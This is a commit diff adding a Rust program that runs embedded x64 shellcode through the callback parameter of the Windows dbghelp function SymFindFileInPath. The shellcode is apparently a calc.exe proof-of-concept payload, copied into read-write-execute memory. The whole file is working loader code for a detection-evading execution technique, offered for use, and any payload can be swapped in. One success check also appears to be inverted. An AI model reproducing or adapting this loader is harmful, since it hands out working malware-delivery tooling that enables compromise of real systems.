Shellcode Exec through SymFindFileInPath

Whitecat18 · web-flow · commit 6b3affc16eed · 2024-08-17T07:02:30.000+05:30
diff --git a/shellcode_exec/SymFindFileInPath.rs b/shellcode_exec/SymFindFileInPath.rs
@@ -0,0 +1,124 @@
+/*
+  Execute Shellcode using SymFindFileInPath ..!
+  By Smukx
+*/
+
+use std::{ffi::CString, ptr::{copy_nonoverlapping, null, null_mut}};
+
+use winapi::{
+    ctypes::c_void, 
+    shared::minwindef::MAX_PATH, 
+    um::{
+        dbghelp::{SymFindFileInPath, SymInitializeW}, 
+        memoryapi::VirtualAlloc, 
+        processthreadsapi::GetCurrentProcess, 
+        winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}
+    }
+};
+#[repr(C)]
+#[allow(non_camel_case_types)]
+pub struct SYMSRV_INDEX_INFO {
+    pub sizeofstruct: u32,
+    pub file: [i8; 261],
+    pub stripped: i32,
+    pub timestamp: u32,
+    pub size: u32,
+    pub dbgfile: [i8; 261],
+    pub pdbfile: [i8; 261],
+    pub guid: winapi::shared::guiddef::GUID,
+    pub sig: u32,
+    pub age: u32,
+}
+
+#[link(name = "dbghelp")] extern "system" {
+    fn SymSrvGetFileIndexInfo(
+        file: *const i8,
+        info: *mut SYMSRV_INDEX_INFO,
+        flags: u32,
+    ) -> i32;
+}
+
+fn main() {
+    unsafe {
+        let shellcode: [u8; 276] = [
+            0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
+            0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
+            0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
+            0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
+            0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
+            0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
+            0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
+            0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
+            0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
+            0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
+            0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
+            0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
+            0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
+            0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
+            0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
+            0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
+            0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
+            0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
+            0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,     
+        ];
+
+        let h_process = GetCurrentProcess();
+
+        let address = VirtualAlloc(
+            null_mut(),
+            shellcode.len(),
+            MEM_RESERVE | MEM_COMMIT,
+            PAGE_EXECUTE_READWRITE,
+        );
+
+        if !address.is_null() {
+            copy_nonoverlapping(
+                shellcode.as_ptr(),
+                address as *mut u8,
+                shellcode.len(),
+            );
+        }
+
+        SymInitializeW(
+            h_process,
+            null(),
+            1,
+        );
+
+        let mut finfo: SYMSRV_INDEX_INFO = std::mem::zeroed();
+
+        // Unwrap the CString and pass its pointer
+        
+        let dll_path = CString::new("C:\\windows\\system32\\kernel32.dll").unwrap();
+
+        let result = SymSrvGetFileIndexInfo(
+            dll_path.as_ptr(),
+            &mut finfo,
+            0,
+        );
+
+        if result == 0 {
+            println!("SymSrvGetFileIndexInfo Success!");
+        } else {
+            println!("SymSrvGetFileIndexInfo Failed!");
+        }
+
+        let mut dummy = vec![0u8; MAX_PATH as usize];
+
+        let search_path = CString::new("c:\\windows\\system32").unwrap();
+        let filename = CString::new("kernel32.dll").unwrap();
+
+        SymFindFileInPath(
+            h_process,
+            search_path.as_ptr(),
+            filename.as_ptr(),
+            &finfo.timestamp as *const _ as *mut c_void,
+            finfo.size,
+            0,
+            0,
+            dummy.as_mut_ptr() as *mut i8,
+            Some(std::mem::transmute(address)),
+            null_mut(),
+        );
+    }
+}
